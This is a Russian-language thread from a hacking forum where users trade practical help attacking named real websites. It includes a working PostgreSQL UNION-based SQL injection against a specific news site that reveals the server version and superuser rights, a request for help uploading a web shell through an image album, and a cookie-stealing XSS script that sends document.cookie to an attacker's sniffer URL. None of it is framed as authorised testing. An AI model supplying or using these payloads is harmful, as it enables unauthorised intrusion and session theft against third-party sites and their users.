ANTICHAT — форум по информационной безопасности, OSINT и технологиям

L I G A, весомую роль играет еще работа скрипта, потому-как неизвестно, что и как фильтруется, и как обработанный запрос к БД, обрабатывает сам скрипт.

Драсте
есть такая штука
http://www.foreignpolicy.org.ua/view2.php?id=28768
если ставлю кавычку то пишет "ОШИБКА: невозможно отобразить выбраную новость"
Если делаю вот так http://www.foreignpolicy.org.ua/view2.php?id=28769-1 то отобразицца моя новость.
Вот беру дальше http://www.foreignpolicy.org.ua/view2.php?id=28768+ORDER+BY+9 и уже узнаю что у меня 9 полей
Но почему вот такой запрос приводит к ошибке
http://www.foreignpolicy.org.ua/view2.php?id=28768+UNION+SELECT+1,2,3,4,5,6,7,8,9

Потому что тут PostgreSQL
http://www.foreignpolicy.org.ua/view2.php?id=-28768+union+select+null,version(),null,null,null,n ull,null,null,null--
PostgreSQL 8.2.13 on i386-portbld-freebsd6.3, compiled by GCC cc (GCC) 3.4.6 [FreeBSD] 20060305
PS Там даже у юзера права usesuper

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Здраствуйте.
Нашол на одном форуме старый альбом.
http://forum.psihov.net.ua/store/album
Пробовал залить шелл через картинку, не получается.
Помогите пж,или подскажыте что можно зделать.

Какой смысл ломать что-то стоящее на домашнем серве под виндой?

Я учусь основ хакинга, для меня даже ето сломать большая робота.
Подскажыте что-то пожайлуста.

Ребят подскажите, есть такой сайт http://www.in-vest-group.ru/component/search/%252F?ordering=&searchphrase=all
на нем есть уязвимость xss, можно проверить в поле поиск, как дальше куки заполучить? что то не выходит...

вместо <script>alert()</script> пишеш <script>
img = new Image(); img.src = "http://ссылка_на_сниф.gif"+document.cookie;
</script>

Roston скажи а сниф гиф например какой?